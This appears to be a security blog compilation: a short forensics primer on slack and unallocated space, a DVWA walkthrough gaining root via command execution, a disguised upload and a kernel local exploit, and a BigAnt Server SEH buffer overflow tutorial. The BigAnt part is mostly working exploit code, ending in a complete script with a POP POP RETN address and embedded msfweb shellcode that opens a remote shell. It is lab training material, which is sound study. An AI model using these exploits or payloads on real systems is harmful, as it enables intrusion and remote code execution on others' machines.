Computer Forensic - Introduction


Computer forensics deals with collecting evidence from an information system, in the form of hardware or software, in a way that can be used as legal evidence in court.

Slack space, sometimes referred to as file slack, is the area between the end of a file and the end of the last cluster or sector used by that file. This area will not be used to store other information, so it is effectively "wasted". The file system does not necessarily clear that area, so it can still hold fragments of whatever occupied the cluster before, which is why slack space matters in a forensic examination. Slack space is common in file systems that use a large cluster size, while a file system that uses a small cluster size can organize the storage media more effectively and efficiently. The amount of wasted disk space can be estimated by multiplying the number of files (including the number of directories) by half the size of a cluster.

Unallocated space, or in other words "free space", is logical space on a hard drive that the system can use to put files in. Unallocated space is the opposite of "allocated" space, which is a place on the hard drive where files are already written or stored. Unallocated space is different from slack space: the system can put files in unallocated space, but it cannot put any files in slack space. Simple, right?  :)


Here's an example. If we put a file into a certain space on the hard drive, that part of the hard drive is now allocated because the file is using it. While a space is allocated, no other file can be written to it. If the file we stored is deleted, that space of the hard drive becomes unallocated, which means we can put other files in it.

Generally, files can only be stored in unallocated space. A new storage device has virtually all of its space unallocated. Why "virtually"? Because a small portion of the space is taken by the system files the file system needs to do its work. For example, on Windows there is always a hidden "recycler" folder that stores data about deleted files, and on Linux it is called ".Trash".

Example case. A newly formatted 100 GB flash disk has 100% unallocated space (actually 99.9%, because of the file system). If a 1 GB file is stored on the disk, there will be 1% (1 GB) allocated space and 99% (99 GB) unallocated space. If a 9 GB movie is then stored on the disk, there will be a total of 10% (10 GB) allocated space and 90% (90 GB) unallocated space. So the movie is stored only in the remaining unallocated space, not overwriting the previous file.
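As an added illustration (my own code, not part of the original post), here is a toy cluster-based disk that models the three states described above: allocated, unallocated and slack. The 4096-byte cluster size and the file names are assumptions; what it shows is that deleting a file and writing a smaller one leaves the old bytes both in the unallocated clusters and in the new file's slack, which is where a forensic examiner looks for them.

```python
CLUSTER = 4096  # assumed cluster size in bytes; the real value depends on the file system

class ToyDisk:
    """Minimal cluster-allocating disk to show allocated, unallocated and slack space."""
    def __init__(self, nclusters):
        self.data = bytearray(nclusters * CLUSTER)  # raw media, zero-filled when new
        self.owner = [None] * nclusters              # file owning each cluster; None = unallocated
        self.sizes = {}                              # logical size of each file

    def write(self, name, content):
        need = -(-len(content) // CLUSTER)           # clusters needed, rounded up
        free = [i for i, o in enumerate(self.owner) if o is None][:need]
        if len(free) < need:
            raise OSError("disk full")
        for k, i in enumerate(free):
            chunk = content[k * CLUSTER:(k + 1) * CLUSTER]
            start = i * CLUSTER
            self.data[start:start + len(chunk)] = chunk  # bytes after the chunk are left as they were
            self.owner[i] = name
        self.sizes[name] = len(content)

    def delete(self, name):
        # Deleting only marks clusters unallocated; their bytes stay until something reuses them.
        self.owner = [None if o == name else o for o in self.owner]
        del self.sizes[name]

    def unallocated_bytes(self):
        return self.owner.count(None) * CLUSTER

    def slack(self, name):
        """File slack: the bytes between the end of `name` and the end of its last cluster."""
        last = max(i for i, o in enumerate(self.owner) if o == name)
        used_in_last = self.sizes[name] - (self.owner.count(name) - 1) * CLUSTER
        return bytes(self.data[last * CLUSTER + used_in_last:(last + 1) * CLUSTER])

def slack_size(file_size, cluster=CLUSTER):
    """Slack of one file, straight from the definition in the text."""
    return -file_size % cluster

def demo():
    disk = ToyDisk(4)
    disk.write("movie.bin", b"M" * (2 * CLUSTER))   # fills clusters 0 and 1 completely
    disk.delete("movie.bin")                         # the disk is 100% unallocated again
    disk.write("note.txt", b"hello")                 # 5 bytes land in cluster 0
    return {
        "unallocated": disk.unallocated_bytes(),     # clusters 1 to 3 are free
        "slack_len": len(disk.slack("note.txt")),    # 4096 - 5
        "slack_residue": disk.slack("note.txt")[:4], # old movie bytes inside note.txt's slack
        "unalloc_residue": bytes(disk.data[CLUSTER:CLUSTER + 4]),  # and in unallocated cluster 1
    }
```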


DVWA Medium Exploitation


In this post, I'll try to show how to gain root access through a web application. There are a lot of methods to do that; this is one of them. The web application that will be used is DVWA (Damn Vulnerable Web Application). You can download it here.

  • Start up MySQL and Apache on BackTrack.

type : #service apache2 start
type : #service mysql start
  • Open DVWA in your browser

type : localhost/dvwa
Log in as usual, with the username admin and password password.
  • and its contents in DVWA
The vulnerability that I'll use to gain root access from this website is its "command execution" page. Because this vulnerability lets commands run on the web server, it is the most dangerous feature a web application can have: an attacker can get a shell without having to place a backdoor on the server.

  • Set the security level to medium, because my training advocated this.
  • Let's try a normal command.

  • I'll use a local exploit on the system to gain root access. Before searching for the exploit, let's see what kernel version the system is running.
  • Finally, I look on exploit-db.com with the keyword 2.6.39,
  • and I found an exploit written in C, which can be downloaded here.
  • After that, let's compile the C file with the command: #gcc Mempodipper.c -o linux


  • Let's try to upload the exploit.
  • The file was not uploaded.
  • Let's try adding an image extension to the exploit. I'll rename it to linux.jpeg
  • and upload again.
  • Good. Now, let's connect to the server using netcat to execute that exploit.
  • Let's see if the exploit was uploaded correctly.
  • Now, run netcat on the DVWA side in listening mode.
  • Look at the bottom/status bar. The browser will wait for a connection. In BackTrack's terminal type this: "nc 127.0.0.1 4321"
  • Let's try to execute it
type : # ./linux.jpeg
  • It's running; if you want to get root,
type : su
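Two defensive checks, added here as an illustration and not DVWA's own code, for the two weaknesses this walkthrough chains together: the command execution page builds its command from user input, and the upload page trusts the file extension. The first accepts only a bare IP address and never goes through a shell, so command separators carry no meaning; the second inspects leading bytes so an ELF renamed linux.jpeg is refused. The magic-number table and the ping flags are assumptions.

```python
import ipaddress
import subprocess

# Leading bytes ("magic numbers") of the formats we care about; an assumed, minimal table.
MAGIC = {
    b"\x7fELF": "elf",             # a Linux executable, which is what linux.jpeg really was
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
}
IMAGE_EXTENSIONS = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png"}

def sniff_type(data):
    """Classify an upload by its first bytes, ignoring the file name entirely."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"

def upload_allowed(filename, data):
    """Accept only when the extension and the actual content agree on an image type."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = IMAGE_EXTENSIONS.get(ext)
    return expected is not None and sniff_type(data) == expected

def is_valid_target(target):
    """True only for a bare IPv4/IPv6 literal; hostnames and anything with extra characters fail."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return False

def ping_args(target):
    """Argument vector for ping; no shell is involved, so no separator can chain a second command."""
    if not is_valid_target(target):
        raise ValueError("target must be an IP address")
    return ["ping", "-c", "3", target]   # flags assumed for a Linux ping

def run_ping(target):
    """Run the validated command without a shell and return its output."""
    return subprocess.run(ping_args(target), capture_output=True, text=True, timeout=15).stdout
```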




#No limit to try harder



Buffer Overflow (SEH) on Ezserver

- First, install Ezserver on Windows XP and run it.

- We do information gathering by scanning the target IP. With the help of nmap we scan for open ports and the target's operating system (target IP = 172.16.227.128):
# nmap -v -sV -A -O -p 1-65535 172.16.227.128
- After that we know port 8000 is open and the target is running Windows XP, so we know the steps to take when we make our fuzzer.


Buffer Overflow BigAnt Server SEH


This time, I will try to explain how to exploit software that has SEH protection, using a program called BigAnt Server. The SEH exception handler keeps the EIP from being overwritten directly by an abnormal flow in the software. This forces us to use different attack vectors and techniques, because the same technique as in the direct EIP-overwrite exploitation will not work because of SEH.


- Create a fuzzer with Python.
This is my fuzzer:

#!/usr/bin/python
import socket

address = "192.168.56.2"          # BigAnt server under test
port = 6660                        # AntServer listening port
buffer = b"USV "                   # command verb the server parses
buffer += b"\x41" * 2500           # 2500 'A' bytes to overflow the receive buffer
buffer += b"\r\n\r\n"              # terminates the request
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address, port))
sock.send(buffer)
sock.close()
print("Done")
- Start BigAnt Server, run OllyDbg and attach it to AntServer, then run the fuzzer that was made above.

- As you can see above, the EIP isn't overwritten directly by the fuzzer, because of the SEH. To view what happened in the SEH, click View > SEH chain.
- The SEH handled the excess 'A' characters. To pass the exception on, so the characters reach the EIP, press Shift+F9.
- In the bottom right of the OllyDbg window, we can see that the data the fuzzer sent to the application also entered the stack memory. To see it, right click on the stack line, then click Follow in Dump.

- To get past the SEH protection we must find a POP POP RETN sequence in one of the modules loaded by BigAnt. The module must not have SafeSEH on, nor have DLLCHARACTERISTICS_NO_SEH set. Usually the modules that lack these are third-party modules from outside Windows, but in this case BigAnt has no modules of its own, so we must use a module from Windows.


- We will use VBAJET32.dll, located in C:\Windows\system32, as the door to get past the SEH, since this module is also loaded by BigAnt.

- After that, we must find the POP POP RETN sequence in this module. Open the module, then right click > Search for > Sequence of Commands.
- Enter POP r32, POP r32 and RETN in the search box.
- Here's what we get: the address of POP POP RETN in the VBAJET32.dll module.


- OK, next we must find the offset at which the SEH is overwritten. As usual, we will use pattern_create and pattern_offset to do this.
- Make a pattern 2500 bytes long, then insert it into the fuzzer.

#!/usr/bin/python
import socket

address = "172.16.227.128"
port = 6660
buffer = b"USV "
# 2500-byte cyclic pattern from pattern_create.rb (split over two lines; Python joins them)
buffer += (b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co"
           b"3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D")
buffer += b"\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address, port))
sock.send(buffer)
sock.close()
print("Done")

- Execute it, then see what happens in OllyDbg. Don't forget to restart both OllyDbg and BigAnt Server first.

- Use pattern_offset to get the exact offset.
# ./pattern_offset.rb 42326742
966
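An added example, my own code rather than the post's or Metasploit's: a pure-Python pattern_create/pattern_offset that reproduces the 966 above from the 42326742 shown in the debugger, and derives the nSEH slot from it. It assumes Metasploit's ordering (upper, lower, digit) and the 2500-byte pattern length used here.

```python
import string
import struct

ALPHABET = (string.ascii_uppercase, string.ascii_lowercase, string.digits)

def pattern_create(length):
    """Cyclic pattern in the Metasploit style: every 3-byte triple 'Uld' is unique."""
    out = []
    for up in ALPHABET[0]:
        for lo in ALPHABET[1]:
            for dg in ALPHABET[2]:
                out.append(up + lo + dg)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    raise ValueError("length exceeds the 20280 bytes a single pass can generate")

def pattern_offset(value, length=2500):
    """Offset in the pattern of the DWORD the debugger showed, e.g. 0x42326742.
    OllyDbg prints the register big-endian, but the bytes were read from the stack
    little-endian, so they are reversed before searching. Returns -1 if absent."""
    needle = struct.pack("<I", value)                # 0x42326742 -> b"Bg2B"
    return pattern_create(length).encode("ascii").find(needle)

def seh_layout(seh_offset):
    """Slots of the SEH record: nSEH sits four bytes before the handler pointer."""
    return {"nseh": seh_offset - 4, "seh": seh_offset}

if __name__ == "__main__":
    off = pattern_offset(0x42326742)
    print(off, seh_layout(off))                      # 966 {'nseh': 962, 'seh': 966}
```

The nSEH value 962 is why the exploit scripts below start with 962 bytes of padding before the four-byte jump.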

- Let's try to overwrite the SEH with the address of POP POP RETN in the VBAJET32.dll module. Change the script again.

#!/usr/bin/python
import socket

address = "172.16.227.128"
port = 6660
buffer = b"USV "
buffer += b"\x90" * 962                   # padding up to the nSEH slot (offset 962 in the pattern)
buffer += b"\xcc\xcc\xcc\xcc"             # nSEH: INT3 breakpoints, so execution stops if it lands here
buffer += b"\x41\x41\x41\x41"             # SEH handler slot (offset 966), still 'AAAA' for now
buffer += b"\x90" * (2504 - len(buffer))  # pad to the same total length as the crash buffer
buffer += b"\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address, port))
sock.send(buffer)
sock.close()
print("Done")
and now:

Place a breakpoint on the POP POP RETN address in the VBAJET32.dll module.
- Now, execute it, then see what the SEH chain displays.
- Press Shift+F9 to continue the process to VBAJET32.dll, then press it again to continue to the POP POP RETN sequence located in the module. After that, press F7 until the process reaches the RETN command.

- Next, generate the payload using msfweb.

- Why are 0x20 and 0x25 in the Restricted Characters column? Because they are bad characters.
- The generated payload.
- Insert it into the fuzzer.

#!/usr/bin/python
import socket

address = "172.16.227.128"
port = 6660
buffer = b"USV "
buffer += b"\x90" * 962                   # padding up to the nSEH slot (offset 962)
buffer += b"\xeb\x06\x90\x90"             # nSEH: short JMP +6, over the handler address below
buffer += b"\x6A\x19\x9A\x0F"             # SEH: POP POP RETN address in VBAJET32.dll (little-endian)
buffer += b"\x90" * 32                    # NOP sled that the JMP lands in
# payload generated with msfweb, with 0x20 and 0x25 excluded as bad characters
buffer += (b"\x33\xc9\xd9\xc2\xbf\x9f\x35\x1b\xc3\xd9\x74\x24\xf4\xb1\x51\x5e"
           b"\x31\x7e\x15\x03\x7e\x15\x83\x59\x31\xf9\x36\x99\x50\x16\xf5\x89"
           b"\x5c\x17\xf9\xb6\xff\x63\x6a\x6c\x24\xff\x36\x50\xaf\x83\xbd\xd0"
           b"\xae\x94\x35\x6f\xa9\xe1\x15\x4f\xc8\x1e\xe0\x04\xfe\x6b\xf2\xf4"
           b"\xce\xab\x6c\xa4\xb5\xec\xfb\xb3\x74\x26\x0e\xba\xb4\x5c\xe5\x87"
           b"\x6c\x87\x2e\x82\x69\x4c\x71\x48\x73\xb8\xe8\x1b\x7f\x75\x7e\x44"
           b"\x9c\x88\x6b\x79\xb0\x01\xe2\x11\xec\x09\x94\x2a\xdd\xea\x32\x27"
           b"\x5d\x3d\x30\x77\x6e\xb6\x36\x6b\xc3\x43\xf6\x9b\x45\x3c\x79\xd5"
           b"\x77\x50\xd5\x16\x51\xce\x85\x8e\x36\x3c\x18\x26\xb0\x31\x6e\xe9"
           b"\x6a\x49\x5e\x7d\x58\x58\xa3\x46\x0e\x5c\x8a\xe7\x27\x47\x55\x96"
           b"\xd5\x80\x98\xcd\x4f\x93\x63\x3d\xe7\x4a\x92\x48\x55\x3b\x5a\x64"
           b"\xf5\x97\xf7\xdb\xa9\x54\xab\x98\x1e\xa4\x9b\x78\xc9\x4b\x40\xe2"
           b"\x5a\xe5\x99\x7f\x34\x51\x43\x0f\x02\xce\x8b\x39\xe6\xe1\x22\x90"
           b"\x08\xd1\xad\xbe\x5a\xfc\xc4\xe9\x5b\xd7\x44\x40\x5b\x08\x02\x8f"
           b"\xea\x2f\x9a\x18\x12\xf9\x4d\xf2\xb8\x53\x91\x2a\xd3\x34\x8a\xb3"
           b"\x12\xbd\x03\xbc\x4d\x6b\x53\x92\x14\xfe\xcf\x74\xb1\x9d\x62\xf1"
           b"\xa4\x08\x2d\x58\x0e\x01\x44\xbd\x3a\xdd\xde\xa3\x8a\x1d\x13\x89"
           b"\x13\xdf\xf9\x33\xa9\xcc\x92\x46\x54\x35\x3e\xf3\x02\x2d\x32\xfd"
           b"\xe6\xb8\x4d\x74\x4d\x3a\x67\x2d\x1a\x96\xd9\x80\xf5\x7c\xdb\x73"
           b"\xa7\xd5\x8a\x8c\x97\xbe\x81\xab\x1d\xf1\x89\xb4\xc8\x67\xd1\xb5"
           b"\xc2\x88\xfd\xc2\x7a\x8b\x7d\x10\xe0\x8c\x54\xca\x16\xa2\x31\x94"
           b"\x30\xa1\xb1\x3b\x3e\xf0\xc9\x6b")
buffer += b"\x90" * (2504 - len(buffer))  # pad to the same total length as the crash buffer
buffer += b"\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address, port))
sock.send(buffer)
sock.close()
print("Done")


- Execute the fuzzer, then connect to the target using telnet.







Copyright © / scxo2oco71
